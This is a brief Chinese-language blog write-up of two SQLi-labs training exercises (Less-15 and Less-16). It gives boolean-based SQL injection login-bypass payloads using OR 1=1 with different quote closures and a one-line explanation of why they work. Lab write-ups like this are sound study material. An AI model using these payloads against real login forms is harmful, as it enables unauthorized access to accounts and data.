Ricky Hao

Less-15~16

Less-15
这个注入使用的是布尔值注入:

uname=admin&passwd=password' or 1=1#&submit=Submit

SQL数据库在查询的时候,因为后面的or 1=1,所以无论前面的查询是否正确,都会返回一个正确的结果,这样就可以Iogged In。

Less-16
同上:

uname=admin&passwd=password") or 1=1#&submit=Submit
点赞

发表评论

电子邮件地址不会被公开。 必填项已用*标注

此站点使用Akismet来减少垃圾评论。了解我们如何处理您的评论数据